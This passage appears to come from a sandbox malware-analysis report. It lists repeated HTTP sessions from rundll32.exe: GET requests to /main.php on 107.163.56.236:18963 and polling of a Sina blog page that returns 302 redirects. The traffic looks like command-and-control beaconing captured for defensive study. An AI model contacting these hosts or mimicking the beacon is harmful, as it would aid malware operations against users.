                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:40 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    32192.168.2.749955107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:42.014028072 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    33192.168.2.749957107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:42.126410961 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    34192.168.2.749958116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:42.126972914 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:45.785994053 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:45 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    35192.168.2.749968107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:46.075443983 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    36192.168.2.749970107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:46.371279001 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    37192.168.2.749971116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:46.372374058 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    38192.168.2.749981107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:50.186664104 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    39192.168.2.749982107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:50.299334049 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    40192.168.2.749983116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:50.299508095 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:52.138010025 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:51 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    41192.168.2.749994107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:54.200027943 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    42192.168.2.749995107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:54.314419985 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    43192.168.2.749996116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:54.314544916 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:44:56.020998001 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:55 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    44192.168.2.750007107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:58.217772961 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    45192.168.2.750008116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:58.331365108 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:00.168304920 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:59 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    46192.168.2.750009107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:44:58.331553936 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    47192.168.2.750021107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:02.217436075 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    48192.168.2.750022116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:02.331999063 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:04.168651104 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:03 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    49192.168.2.750023107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:02.333841085 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    50192.168.2.750034107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:06.244977951 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    51192.168.2.750035107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:06.377504110 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    52192.168.2.750036116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:06.377635956 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:08.216953993 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:07 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    53192.168.2.750047107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:10.377417088 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    54192.168.2.750049107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:10.544595957 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    55192.168.2.750050116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:10.544713974 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:12.343481064 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:12 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    56192.168.2.750061107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:14.502003908 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    57192.168.2.750062107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:14.627757072 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    58192.168.2.750063116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:14.627959013 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:16.332056046 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:16 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    59192.168.2.750074107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:18.626888037 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    60192.168.2.750075107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:18.751976967 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    61192.168.2.750076116.133.8.92807816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:45:18.753139019 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Dec 19, 2024 15:45:21.154957056 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx/1.2.8
                                                                                                                                    Date: Thu, 19 Dec 2024 14:45:20 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 160
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
